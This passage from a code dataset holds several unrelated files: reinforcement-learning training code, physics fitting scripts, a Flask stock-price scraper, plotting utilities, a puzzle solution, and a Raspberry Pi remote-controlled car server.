{9}, num. 
rewards: {10}'.format(\n step,\n num_frame,\n avg_epi_reward,\n 0.05,\n agent.lr,\n int(time_dif),\n int(training_rate),\n eval_time,\n int(eval_frames / eval_time),\n nepisodes,\n nrewards))\n\n if opt.save_transitions_freq and step % opt.save_transitions_freq == 0:\n filepath = '{}/{}_{}_transitions_score_step{:010d}.txt'.format(opt.log_dir, opt.env, opt.backend, step)\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'step[{0}] save score distribution in transitions to [{1}]'.format(step, filepath))\n _save_score_dist(agent.transitions.score[:agent.transitions.numEntries], filepath)\n filepath = '{}/{}_{}_samplebuf_score_step{:010d}.txt'.format(opt.log_dir, opt.env, opt.backend, step)\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'step[{0}] save score distribution in sample buffer to [{1}]'.format(step, filepath))\n _save_score_dist(agent.transitions.buf_score, filepath)\n\n if step % opt.save_freq == 0 or step == opt.steps:\n filepath = '{}/{}_{}_network_step{:010d}.dat'.format(opt.log_dir, opt.env, opt.backend, step)\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'step[{0}] save network to [{1}]'.format(step, filepath))\n agent.save_network(filepath)\n\n \n\n sys.stdout.flush()\n\ndef _save_score_dist(scores, filepath):\n count_score = Counter(scores)\n str = ''\n for cls, num in count_score.most_common():\n str = '{}{:d}:{}\\n'.format(str, cls*10, num)\n str = '{}total {}\\n'.format(str, scores.sum())\n str = '{}max {}\\n'.format(str, scores.max())\n str = '{}min {}\\n'.format(str, scores.min())\n str = '{}mean {}\\n'.format(str, scores.mean())\n str = '{}median {}\\n'.format(str, np.median(scores))\n str = '{}var {}\\n'.format(str, np.var(scores))\n str = '{}std {}\\n'.format(str, np.std(scores, ddof=1))\n print(str)\n with open(filepath, 'wt') as f:\n f.write(str)\n\n\ndef test_main(game_env, agent, game_actions, opt):\n\n total_reward = 0\n nrewards = 0\n nepisodes = 0\n episode_reward = 0\n episode_rewards = []\n\n eval_time = time.time()\n \n q_value_visualizer = QValueVisualizer(opt)\n \n print('--------------------------------------------------------------')\n print('test start',datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n\n if opt.test_recording:\n game_env.start_recording(0, q_value_visualizer)\n\n screen, reward, terminal, info = game_env.getState()\n\n while nepisodes < opt.test_episodes:\n \n action = agent.perceive(screen, reward, terminal, True, opt.test_ep)\n\n q_value_visualizer.collect_q_value(agent.q)\n\n screen, reward, terminal, info = game_env.step(game_actions[action], False)\n\n episode_reward = episode_reward + reward\n\n if opt.render:\n game_env.render(agent.q)\n\n if terminal:\n print('episode:{:03d} reward:{}'.format(nepisodes+1, episode_reward))\n episode_rewards.append(episode_reward)\n episode_reward = 0\n nepisodes = nepisodes + 1\n\n screen, reward, terminal, info = game_env.nextRandomGame()\n \n if opt.test_recording:\n game_env.stop_recording()\n\n episode_rewards = np.array(episode_rewards)\n print('test end', datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n 'total reward: {:.2f}'.format(episode_rewards.sum()),\n '[{}]average reward: {:.2f}'.format(opt.test_episodes, episode_rewards.mean()),\n '[{}]stdv: {:.2f}'.format(opt.test_episodes, episode_rewards.std(ddof=1)),\n '[30]average reward: {:.2f}'.format(episode_rewards[:30].mean()),\n '[30]stdv: {:.2f}'.format(episode_rewards[:30].std(ddof=1)),\n )\n\ndef main():\n import subprocess\n import os\n\n opt = get_opt()\n\n from initenv import setup\n game_env, agent, game_actions, 
opt = setup(opt)\n\n if opt.test:\n test_main(game_env, agent, game_actions, opt)\n else:\n rootdir = os.getcwd().replace(\"/dqn\",\"\")\n subprocess.run([os.path.join(rootdir,\"copy_source.sh\"), rootdir, opt.log_dir])\n train_main(game_env, agent, game_actions, opt)\n\n del game_env\n\n\nif __name__ == '__main__':\n \n main()\n","sub_path":"dqn/train_agent.py","file_name":"train_agent.py","file_ext":"py","file_size_in_byte":10837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"482078263","text":"#!/usr/bin/python\nfrom ROOT import *\n\nuseSingleGaussian = True\n\nworkspace = RooWorkspace('etac mass')\n#construct double gaussian resolution function and breit wigner\nworkspace.factory('BreitWigner::breitwigner(x[2.65, 3.25], BreitWignerMean[2.983], BreitWignerWidth[0.0322])')\nworkspace.var('x').setUnit('GeV/c^{2}')\nworkspace.factory('Gaussian::gaus1(x, GausMean1[0.006, -0.01, 0.01], GausSigma1[0.003, -0.02, 0.02])')\nworkspace.factory('expr::GausSigma2(\\'GausSigma1*alpha\\',GausSigma1,alpha[3., 1., 5.])')\nworkspace.factory('expr::GausMean2(\\'GausMean1 + MeanShift\\', GausMean1, MeanShift[0.02, -0.04, 0.04])')\nworkspace.factory('Gaussian::gaus2(x, GausMean2, GausSigma2)')\nworkspace.factory('SUM::ResolutionSignal(fracgaus1[0.9, 0.1, 0.99]*gaus1, gaus2)')\n#build signal function as convolution of breit-wigner and resolution function\nworkspace.factory('FCONV::CompleteSignalModel(x, breitwigner, ResolutionSignal)')\nworkspace.factory('FCONV::OneGaussianSignalModel(x, breitwigner, gaus1)')\n#print workspace content\nworkspace.Print()\n#generate data\nif useSingleGaussian:\n pdf = workspace.pdf('OneGaussianSignalModel')\nelse:\n pdf = workspace.pdf('CompleteSignalModel')\n\ndatahist = pdf.generate(RooArgSet(workspace.var('x')), 3000)\npdf.fitTo(datahist, RooFit.Strategy(2), RooFit.Minimizer('Minuit2'))\n\n#print data and fit\ncanvas = TCanvas('canvas', 'canvas')\ncanvas.cd()\nframe = workspace.var('x').frame()\ndatahist.plotOn(frame)\npdf.plotOn(frame)\nframe.Draw()\ncanvas.Print('DoubleGaussianConvolution.pdf')\n","sub_path":"ROOT/fit/BreitWignerConvolution_workspace.py","file_name":"BreitWignerConvolution_workspace.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"482687629","text":"from flask import Blueprint, render_template, request, jsonify, url_for\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\n\nfrom selenium import webdriver\n\nbp = Blueprint('main', __name__, url_prefix='/')\n\n@bp.route('/')\ndef index():\n return render_template('index.html')\n\n@bp.route('/clock')\ndef clock():\n return render_template('clock.html')\n\n@bp.route('/stock', methods=['POST'])\ndef stock():\n # company_codes = [\"005930\", \"000660\", \"005380\"]\n data = request.get_json()\n code1 = data['code1']\n code2 = data['code2']\n code3 = data['code3']\n\n company_codes = []\n company_codes.append(code1)\n company_codes.append(code2)\n company_codes.append(code3)\n\n prices = []\n for item in company_codes:\n now_price = get_price(item)\n prices.append(now_price)\n\n sise = {\n 'code1': prices[0], 'code2': prices[1], 'code3': prices[2]\n }\n\n return jsonify(result2= \"ok\", result3= sise, now= datetime.today())\n\ndef get_price(company_code):\n bs_obj = get_bsoup(company_code)\n no_today = bs_obj.find(\"p\", {\"class\": \"no_today\"})\n blind = no_today.find(\"span\", {\"class\": \"blind\"})\n\n now_price = 
blind.text\n return now_price\n\ndef get_bsoup(company_code):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}\n url = \"https://finance.naver.com/item/main.nhn?code=\" + company_code\n\n result = requests.get(url, headers=headers)\n if result.status_code == 200:\n bs_obj = BeautifulSoup(result.content, \"html.parser\")\n return bs_obj\n else:\n print(result.status_code)\n\n# daum - ajax\n@bp.route('/daum', methods=['POST'])\ndef daum():\n data = request.get_json()\n code1 = data['code1']\n code2 = data['code2']\n code3 = data['code3']\n\n company_codes = []\n company_codes.append(code1)\n company_codes.append(code2)\n company_codes.append(code3)\n\n prices = []\n for item in company_codes:\n now_price = get_daum(item)\n prices.append(now_price)\n\n sise = {\n 'code1': prices[0], 'code2': prices[1], 'code3': prices[2]\n }\n\n return jsonify(result2= \"ok\", result3= sise, now= datetime.today())\n\ndef get_daum(company_code):\n headers = {\n 'Referer': 'http://finance.daum.net',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 OPR/58.0.3135.127'\n }\n\n url = 'https://finance.daum.net/api/quotes/A%s?summary=false&changeStatistics=true' %(company_code)\n\n response = requests.get(url, headers=headers)\n jsonObj = response.json()\n #print(jsonObj)\n #print(jsonObj['name'] + '(' + jsonObj['symbolCode'] + ')')\n\n now_price = jsonObj['tradePrice']\n return now_price\n\n# itooza - bs4\n@bp.route('/itooza_stock', methods=['POST'])\ndef itooza_stock():\n data = request.get_json()\n code1 = data['code1']\n code2 = data['code2']\n code3 = data['code3']\n\n company_codes = []\n company_codes.append(code1)\n company_codes.append(code2)\n company_codes.append(code3)\n\n prices = []\n for item in company_codes:\n now_price = get_itooza(item)\n prices.append(now_price)\n\n sise = {\n 'code1': prices[0], 'code2': prices[1], 'code3': prices[2]\n }\n\n return jsonify(result2= \"ok\", result3= sise, now= datetime.today())\n\ndef get_itooza(company_code):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}\n url = 'https://search.itooza.com/search.htm?seName=' + company_code\n\n result = requests.get(url, headers=headers)\n bs_obj = BeautifulSoup(result.content, \"html.parser\")\n find_1 = bs_obj.find(\"h2\", {\"class\": \"increase\"})\n find_2 = find_1.find(\"span\")\n\n now_price = find_2.text\n return now_price\n\n\n\n","sub_path":"pybo/views/main_views.py","file_name":"main_views.py","file_ext":"py","file_size_in_byte":3910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"215099153","text":"# Jan 29 2013\nimport prman\n\nclass Rif(prman.Rif):\n\tflag = 0\n\tdef __init__(self, ri, args):\n\t\tself.scale = float(args[0])\n\t\tself.kind = int(args[1]) # set to 1 for a volume\n\t\tprman.Rif.__init__(self, ri)\n\t\t\t\t\t\n\tdef PointsGeneralPolygons(self, nloops, nverts, verts, params):\n\t\topcodes = []\n\t\tif self.kind == 1: # we want a volume\n\t\t\topcodes.append(8)\n\t\tnumblobs = len(params['P'])/3\n\t\tfor n in range(numblobs):\n\t\t\topcodes.append(1001)\n\t\t\topcodes.append(n * 16)\n\t\topcodes.append(0)\t# blending code\n\t\topcodes.append(numblobs)# blend all blobs\n\t\tfor n in range(numblobs):\n\t\t\topcodes.append(n)# indices of the blobs to blend\n\t\tcommon = 
(self.scale,0,0,0,0,self.scale,0,0,0,0,self.scale,0)\n\t\ttransforms = (self.scale,0,0,0,0,self.scale,0,0,0,0,self.scale,0)\n\t\txyz = params['P']\n\t\tnumxyz = len(xyz)\n\t\tfor n in range(0, numxyz, 3):\n\t\t\tpos = (xyz[n], xyz[n+1], xyz[n+2])\n\t\t\tif n == 0:\n\t\t\t\ttransforms = common + pos + (1,)\n\t\t\telse:\n\t\t\t\ttransforms = transforms + common + pos + (1,)\n\t\tparams = {}\n\t\tstrs = ('',)\n\t\tself.m_ri.Blobby(numblobs,opcodes,transforms, strs, params)\n\n","sub_path":"Pipeline/the_LATEST/latest_MAYA/maya_SCRIPTS/RfM_python/rif_meshToBlobby.py","file_name":"rif_meshToBlobby.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
{"seq_id":"359415165","text":"import pandas as pd\nimport glob\n\ndate = \"date_2019_03_03_18_37_03\" #date_2019_02_24_19_50_14\"\nstrat_space = \"S_08\"\ntransition = \"EqualSay_G2_Default\"\n\neps = 2\n\noutput = \"{:s}_{:s}.csv\".format(strat_space, transition)\n#data_filename = \"{:s}_{:s}.csv\".format(strat_space, transition)\n\ndata_folder = \"data/b1_effect/eps_1.00e-0{:d}_beta_2.00e+00_T_5.00e+05_c_1.00_b2_1.20/{:s}/\".format(eps, date)\n\nprint(data_folder)\n\n\ninteresting_files = glob.glob(data_folder + \"*.csv\")\nprint(\"Merging \" + str(len(interesting_files)) + \" files.\")\n#print(interesting_files)\n\ndf_list = []\nfor filename in sorted(interesting_files):\n df_list.append(pd.read_csv(filename))\nfull_df = pd.concat(df_list)\n\nfull_df.to_csv(data_folder + output, index=False)","sub_path":"new_code/merge_csvs.py","file_name":"merge_csvs.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
{"seq_id":"474168431","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport os\n\nplt.style.use(\"bmh\")\nsns.color_palette(\"hls\", 1)\n\nimport matplotlib\nmatplotlib.rc('xtick', labelsize=14)\nmatplotlib.rc('ytick', labelsize=14)\nmatplotlib.rcParams['mathtext.fontset'] = 'stix'\nmatplotlib.rcParams['font.family'] = 'STIXGeneral'\n\ndef get_data(filename, variables):\n df = pd.read_csv(filename,\\\n delim_whitespace=True, \\\n engine='python', \\\n names=variables)\n return df\n #using pandas to read the data files\n\ndef linear_regresion(x, y):\n n = float(len(x))\n D = float(np.sum(np.square(x)) - (np.sum(x)**2)/n)\n E = float(np.sum(x*y) - np.sum(x)*np.sum(y)/n)\n F = float(np.sum(np.square(y)) - (np.sum(y)**2)/n)\n\n delta_m = np.sqrt((1/(n-2))*(D*F-E**2)/(D**2))\n delta_c = np.sqrt(1/(n-2)*(D/n+np.mean(x)**2)*(D*F-E**2)/(D**2))\n m = E/D\n c = np.mean(y)-m*np.mean(x)\n\n return m, c, delta_m, delta_c\n #using linear regression from Squires, with uncertainty to find slope and constant term\n\n\nresults = get_data(\"../data/different_N_log.txt\", [\"N\", \"f\", \"tau\", \"dtau\", \"LC\", \"SC\", \"BA\", \"HA\"])\nprint(results[\"N\"])\nD = 1\nL = results[\"N\"]**D\nL_res = 1/L\nm, c, delta_m, delta_c = linear_regresion(L_res, -results[\"tau\"])\nx = np.linspace(0, max(L_res), int(10))\ntau_analytic = 187/91\n\nplt.plot(x, c+m*x)\nplt.errorbar(L_res, -results[\"tau\"], yerr=results[\"dtau\"], fmt=\"o\")\n\nplt.fill_between(x, c-delta_c+(m-delta_m)*x, c+delta_c+(m+delta_m)*x, alpha=0.3)\nplt.plot(0, tau_analytic, \"*\")\nprint(c, delta_c)\nplt.xlabel(r\"Reciprocal lattice length $\\sqrt{1/N}$\", fontsize=14)\nplt.ylabel(r\"Fisher-exponent $\\tau$\", fontsize=14)\n#plt.savefig(\"../figures/tau.pdf\", 
bbox_inches=\"tight\")\n#os.system('pdfcrop %s %s &> /dev/null &'%(\"../figures/tau.pdf\", \"../figures/tau.pdf\"))\nplt.show()\n\n\nresults = get_data(\"../data/different_N_log.txt\", [\"N\", \"f\", \"tau\", \"dtau\", \"LC\", \"SC\", \"BA\", \"HA\"])\nm, c, delta_m, delta_c = linear_regresion(np.log(results[\"N\"]), np.log(results[\"BA\"]))\n\nplt.plot(results[\"N\"], results[\"BA\"], \"o\")\nplt.plot(results[\"N\"], np.exp(c + m*np.log(results[\"N\"])))\n#plt.fill_between(results[\"N\"], np.exp(c - delta_c + (m-delta_m)*np.log(results[\"N\"])), np.exp(c + delta_c + (m+delta_m)*np.log(results[\"N\"])), alpha=0.5)\nprint(m, c, delta_m, delta_c)\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.xlabel(r\"System length $\\,\\,\\sqrt{N}$\", fontsize=14)\nplt.ylabel(r\"Sisze of largest cluster $\\,\\,s_{max}$\", fontsize=14)\n#plt.savefig(\"../figures/largest_cluster.pdf\", bbox_inches=\"tight\")\n#os.system('pdfcrop %s %s &> /dev/null &'%(\"../figures/largest_cluster.pdf\", \"../figures/largest_cluster.pdf\"))\nplt.show()\n","sub_path":"midterm/plotting/plot_different_N.py","file_name":"plot_different_N.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"566056970","text":"\ndef part1():\n f = open(\"/home/ec2-user/environment/AOC/Resources/problem6.txt\")\n s = set()\n answer = 0\n for current in f.readlines():\n current = current.strip()\n if current == \"\\n\" or current == \"\":\n s.clear()\n else:\n for c in current:\n if c not in s:\n s.add(c)\n answer += 1\n return answer\n \nprint(part1())\n\ndef part2():\n f = open(\"/home/ec2-user/environment/AOC/Resources/problem6.txt\")\n s = set()\n t = set()\n newgroup = True\n answer = 0\n for current in f.readlines():\n current = current.strip()\n if current == \"\\n\" or current == \"\":\n answer += len(s)\n s.clear()\n newgroup = True\n else:\n # if this is the first line, fill the set\n if newgroup:\n newgroup = False\n for c in current:\n s.add(c)\n else:\n for c in current:\n t.add(c)\n s.intersection_update(t)\n t.clear()\n answer += len(s)\n return answer\n\n\nprint(part2()) ","sub_path":"Python/problem6.py","file_name":"problem6.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"605483623","text":"#!/usr/bin/python3\n\nimport os\nimport sys\nimport threading\nimport time\nimport json\nimport tornado.ioloop\nimport tornado.web\nimport tornado.websocket\nimport tornado.httpserver\nimport psutil\nimport subprocess\nimport logging\nimport argparse\nimport RPi.GPIO as GPIO\nfrom datetime import datetime, timedelta\nfrom tornado.options import define, options, parse_command_line\nfrom multiprocessing import Process\nfrom pygame import mixer\n\nmixer.init()\nshot = mixer.Sound('sounds/shot.wav')\n\n# For working with SPI protocol, Analogue sensors and battery level\nimport Adafruit_GPIO.SPI as SPI\nimport Adafruit_MCP3008\nSPI_PORT = 0\nSPI_DEVICE = 0\ntry:\n mcp = Adafruit_MCP3008.MCP3008(spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE))\nexcept:\n mcp = None\nbat_max = 792\nbat_min = 150\nbat_channel = 4 # MCP3008 channels\n\n\n# For working with i2c protocol\nimport Adafruit_PCA9685\npwm = Adafruit_PCA9685.PCA9685()\npwm.set_pwm_freq(60)\n\nchannels = {\n 'steering': 0, \n 'accelerate': 1, \n 'camera': 2,\n\n 'low_beam': 4, \n 'high_beam': 5, \n 'left_signal': 6, \n 'right_signal': 7, \n\n 'stop_signal': 8, \n 'rear_signal': 9, \n\n 'machinegun1': 12,\n 
'machinegun2': 13,\n}\n\nled_pulse = 4095\n\nparser = argparse.ArgumentParser(description='Parameters for avacar device.')\nparser.add_argument('--url', help='URL for tornado to listen on')\nparser.add_argument('--avacar_type', help='Avacar type (drift, touring etc.)')\nparser.add_argument('--session_id', help='Unique session id')\nparser.add_argument('--accelerate_coeff', help='Acceleration coeff')\nparser.add_argument('--steering_coeff', help='Steering coeff')\nparser.add_argument('--battery_voltage', help='Battery voltage for measuring the current charge level')\nparser.add_argument('--wheel_radius', help='Wheel radius for correct speed measuring')\nparser.add_argument('--accelerate_idle', type=int, help='Default position for accelerate')\nparser.add_argument('--accelerate_start', type=int, help='Pulse from which starts to accelerate')\nparser.add_argument('--accelerate_max', type=int, help='Max pulse')\nparser.add_argument('--accelerate_nitro', type=int, help='Pulse with nitro enabled')\nparser.add_argument('--backwards_start', type=int, help='Pulse from which starts moving backwards')\nparser.add_argument('--backwards_max', type=int, help='Max backwards pulse')\nparser.add_argument('--steering_idle', type=int, help='Default pulse for steering')\nparser.add_argument('--steering_max', type=int, help='Max pulse for steering')\nparser.add_argument('--nitro_level', type=float, help='Initial nitro level')\nparser.add_argument('--min_lap_time', type=float, help='Minimum possible lap time on the location')\nparser.add_argument('--total_laps', type=int, help='Total race laps to go. Disconnects after finishing')\nparser.add_argument('--machinegun_rounds', type=int, help='Machinegun rounds given for race')\n\nparser.add_argument('--user_acceleration', type=float, help='User custom parameter')\nparser.add_argument('--user_max_speed', type=float, help='User custom parameter')\nparser.add_argument('--user_steering', type=float, help='User custom parameter')\nparser.add_argument('--user_braking', type=float, help='User custom parameter')\nparser.add_argument('--power_boost', type=float, help='Increase acceleration by this parameter')\nparser.add_argument('--speed_boost', type=float, help='Increase max speed by this parameter')\n\n\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename='/var/log/avacar.log',\n # filemode='w'\n )\n\nargs = parser.parse_args()\nlogging.info(args)\n\n# Set outputs to default position\npwm.set_pwm(channels['accelerate'], 0, args.accelerate_idle)\npwm.set_pwm(channels['steering'], 0, args.steering_idle)\npwm.set_pwm(channels['camera'], 0, 375)\n\nos.system(\"amixer set 'PCM' 90%\") # Make 90% volume to analogue out\n\n\nclass avacar():\n def __init__(self):\n self.proc_start_time = datetime.now()\n self.connected_time = None\n self.last_activity_time = datetime.now()\n self.no_activity = False\n self.last_session_update = datetime.now()\n self.last_message_ts = datetime.now()\n\n # User custom control parameters\n try:\n self.user_acceleration = args.user_acceleration\n except:\n self.user_acceleration = 1\n try:\n self.user_max_speed = args.user_max_speed\n except:\n self.user_max_speed = 1\n try:\n self.user_steering = args.user_steering\n except:\n self.user_steering = 1\n try:\n self.user_braking = args.user_braking\n except:\n self.user_braking = 1\n\n try:\n self.power_boost = 1 + args.power_boost\n except:\n self.power_boost = 1\n try:\n self.speed_boost = 1 + 
args.speed_boost\n except:\n self.speed_boost = 1\n\n\n self.wheel_connected = False\n self.drive = True\n self.rear_drive = False\n self.rpm = 0\n self.rpm_idx = 0\n self.gear = 1\n self.power = 0 # In fact it's motor power from 0 to 1\n\n self.last_engine_stroke = datetime.now() # Last engine stroke sound\n\n self.acceleration = 0\n if args.accelerate_coeff:\n self.accelerate_coeff = float(args.accelerate_coeff)\n else:\n self.accelerate_coeff = 1\n self.steering = 0\n self.steering_step = 0.01\n if args.steering_coeff:\n self.steering_coeff = float(args.steering_coeff)\n else:\n self.steering_coeff = 1\n self.session_log = ''\n\n # These values are valid with 60Hz frequency\n self.pulse_accelerate = 370\n self.nitro = False\n self.nitro_level = args.nitro_level\n self.pulse_steering = 375\n self.key_up = False\n self.key_down = False\n self.key_left = False\n self.key_right = False\n self.brake_last_ts = datetime.now()\n\n # Measuring real speed\n self.last_hall_pulse = None\n self.distance = 0\n self.start_time = None\n self.speed = 0\n self.speed_max = 0\n self.speed_avg = 0\n # self.wheel_radius = 0.03\n if args.wheel_radius:\n self.wheel_radius = float(args.wheel_radius)*0.01\n else:\n self.wheel_radius = 0\n\n # Laps\n self.line_crossed_last = datetime.now()\n self.line_crossed = False\n self.total_acceleration = 200\n self.total_steering = 50\n\n self.laps_count = -1\n self.laps_count_last = -1\n self.min_lap_time = args.min_lap_time\n self.start_race_time = None\n self.start_lap_time = None\n self.last_lap_time = None\n self.best_lap_time = None\n if args.total_laps:\n self.total_laps = args.total_laps\n else:\n self.total_laps = None\n self.finished = False\n self.race_time = None\n\n # Lights and signals\n self.low_beam = False\n self.low_beam_last = datetime.now()\n self.high_beam = False\n self.high_beam_last = datetime.now()\n self.turn_right_signal = False\n self.turn_right_signal_last = datetime.now()\n self.left_blink = False\n self.turn_left_signal = False\n self.turn_left_signal_last = datetime.now()\n self.right_blink = False\n self.danger_signal = False\n self.danger_signal_last = datetime.now()\n\n # Shooting\n self.shooting = False\n self.last_shot_ts = None\n self.machinegun_rounds = args.machinegun_rounds\n\n # Individual car characteristics\n # self.speed_max = 150\n self.gearshift_delay = 0.3 # sec\n self.rpm_ratio = 250 # how fast it increases rpm\n self.gear_ratio = {1: 4, 2: 2, 3: 1.5, 4: 1, 5: 0.8, 6: 0.7 }\n \n self.gear_speed_max = {1: 44, 2: 88, 3: 116, 4: 175, 5: 218, 6: 250 }\n self.accelerate_last = 0\n self.max_power = {}\n # for i in range(1,7):\n # self.max_power[i] = self.gear_speed_max[i]/self.speed_max\n # print(self.max_power)\n self.braking_coeff = 10 # how good it brakes\n\n # Camera orientation\n self.camera_x = 0\n self.camera_y = 0\n\n\ndef engine_sound():\n # logging.info('Play engine sound')\n os.system('play sounds/engine_stroke.wav speed %s' % (1+avacar.acceleration))\n\n\ndef hallSensor(channel):\n if not GPIO.input(GPIO_map['hall_sensor']):\n if not avacar.last_hall_pulse:\n avacar.last_hall_pulse = datetime.now()\n else:\n if (datetime.now() - avacar.last_hall_pulse).microseconds > 25000:\n distance = 2*avacar.wheel_radius*3.14\n avacar.distance += distance\n if avacar.start_time:\n avacar.speed_avg = round(avacar.distance/(datetime.now() - avacar.start_time).seconds, 2)\n else:\n avacar.start_time = datetime.now()\n avacar.speed = (distance / (datetime.now() - avacar.last_hall_pulse).microseconds)*1000000 # 2*pi*radius / time\n 
avacar.speed_max = max(avacar.speed_max, avacar.speed)\n avacar.last_hall_pulse = datetime.now()\n\n\ndef reflectSensor(channel):\n # if GPIO.input(GPIO_map['reflect_sensor']):\n\n if GPIO.input(GPIO_map['light_sensor']):\n pass \n else:\n logging.info('Line crossed')\n if (datetime.now() - avacar.line_crossed_last).total_seconds() > 5 and avacar.total_acceleration >= 200 and avacar.total_steering >= 50: # 200 is a statistically determined acceleration threshold\n avacar.line_crossed = True\n avacar.line_crossed_last = datetime.now()\n logging.info(avacar.total_acceleration)\n logging.info(avacar.total_steering)\n avacar.total_acceleration = 0\n avacar.total_steering = 0\n\n\ndef run_avacar():\n while True:\n # Kill process if no one connected during 30 seconds\n if (datetime.now() - avacar.proc_start_time).total_seconds() > 30 and not avacar.connected_time:\n # logging.error('No one connected to the device, exiting..')\n # os.system('killall -9 raspivid gst-launch-1.0 avacar.py')\n kill_process()\n sys.exit()\n # Kill process if no activity after 5 minutes\n # logging.info((datetime.now() - avacar.last_activity_time).total_seconds())\n if avacar.last_activity_time and (datetime.now() - avacar.last_activity_time).total_seconds() > 300:\n logging.error('Not active for more than 5 minutes, exiting..')\n kill_process()\n time.sleep(0.1)\n\n\ndef kill_process():\n logging.info('Killing process...')\n pwm.set_pwm(channels['accelerate'], 0, args.accelerate_idle)\n pwm.set_pwm(channels['steering'], 0, args.steering_idle)\n # os.system('killall -9 raspivid gst-launch-1.0')\n os.system('pkill -f -9 raspivid')\n os.system('pkill -f -9 gst-launch-1.0')\n os.system('pkill -f -9 avacar')\n # sys.exit()\n\n\ndef run_engine():\n ''' Play engine sound '''\n # if (datetime.now() - avacar.last_engine_stroke).microseconds > 50000*(1.5-avacar.acceleration):\n while True:\n # engine_sound_thread = threading.Thread(name='engine_sound', target=engine_sound)\n # engine_sound_thread.daemon = True\n # engine_sound_thread.start()\n\n engine_sound_proc = Process(target=engine_sound)\n engine_sound_proc.start()\n # engine_sound_proc.join()\n\n time.sleep(0.16*(1.5-avacar.acceleration))\n\n\ndef run_weapons():\n while True:\n if avacar.shooting:\n if not avacar.last_shot_ts:\n avacar.last_shot_ts = datetime.now()\n elif avacar.last_shot_ts and (datetime.now() - avacar.last_shot_ts).total_seconds() >= 0.1 and avacar.machinegun_rounds > 0:\n avacar.last_shot_ts = datetime.now()\n shot.stop()\n shot.play()\n pwm.set_pwm(channels['machinegun1'], 0, led_pulse)\n pwm.set_pwm(channels['machinegun2'], 0, led_pulse)\n avacar.machinegun_rounds -= 1\n logging.info('Rounds left: ' + str(avacar.machinegun_rounds))\n time.sleep(0.05)\n pwm.set_pwm(channels['machinegun1'], 0, 0)\n pwm.set_pwm(channels['machinegun2'], 0, 0)\n\n\nclass WebSocketHandler(tornado.websocket.WebSocketHandler):\n\n def check_origin(self, origin):\n return True\n\n def open(self, *args):\n logging.info('Client connected')\n # self.stream.set_nodelay(True)\n # self.loop = tornado.ioloop.PeriodicCallback(self.monitor_parameters, 5000, io_loop=tornado.ioloop.IOLoop.instance())\n self.loop = tornado.ioloop.PeriodicCallback(self.monitor_parameters, 5000)\n self.loop.start()\n avacar.connected_time = datetime.now()\n\n def on_message(self, message):\n \"\"\" Actions on receiving keypresses from WEB, return parameters to js \"\"\"\n self.handle_controls(message)\n avacar_dict = str(avacar.__dict__.copy())\n\n def monitor_parameters(self):\n link_quality, signal_level = 
self.get_wifi_signal()\n battery_level = self.get_battery_level()\n temperature = self.get_temp()\n self.write_message(json.dumps({'link_quality': link_quality, 'signal_level': signal_level.replace('Noise',''), 'battery_level': battery_level, 'temperature': temperature}))\n\n def handle_controls(self, message):\n keys_dict = eval(message)\n pulse_accelerate = None\n # print(datetime.now(), keys_dict)\n # logging.info(keys_dict)\n\n avacar.last_message_ts = datetime.now()\n ts_start = datetime.now()\n message = {}\n\n if 'start' in keys_dict:\n if not avacar.start_time:\n avacar.start_time = datetime.now()\n avacar.session_log = 'logs/%s.log' % keys_dict['session_id']\n\n # For changing configuration parameters online\n if 'user_acceleration' in keys_dict:\n logging.info(keys_dict)\n avacar.user_acceleration = keys_dict['user_acceleration']\n if 'user_max_speed' in keys_dict:\n logging.info(keys_dict)\n avacar.user_max_speed = keys_dict['user_max_speed']\n if 'user_steering' in keys_dict:\n logging.info(keys_dict)\n avacar.user_steering = keys_dict['user_steering']\n if 'user_braking' in keys_dict:\n logging.info(keys_dict)\n avacar.user_braking = keys_dict['user_braking']\n\n keys_list = []\n for key, val in keys_dict.items():\n try:\n if eval(val):\n keys_list.append(key)\n except:\n pass\n\n if 'gamepad' in keys_dict:\n accelerate = keys_dict['accelerate']\n if -1 <= accelerate < 0:\n keys_list.append('38')\n elif 0 < accelerate <= 1:\n keys_list.append('40')\n accelerate = abs(accelerate)\n\n steering = keys_dict['steering']\n if -1 <= steering < 0:\n keys_list.append('37')\n elif 0 < steering <= 1:\n keys_list.append('39')\n else:\n accelerate = 1\n steering = 1\n\n if '38' in keys_list: # Up\n if avacar.rear_drive:\n avacar.rear_drive = False\n if args.avacar_type == 'Drift':\n avacar.acceleration = 1\n if avacar.rpm < 1:\n avacar.rpm += 0.3*avacar.user_acceleration*avacar.power_boost*accelerate\n else:\n if 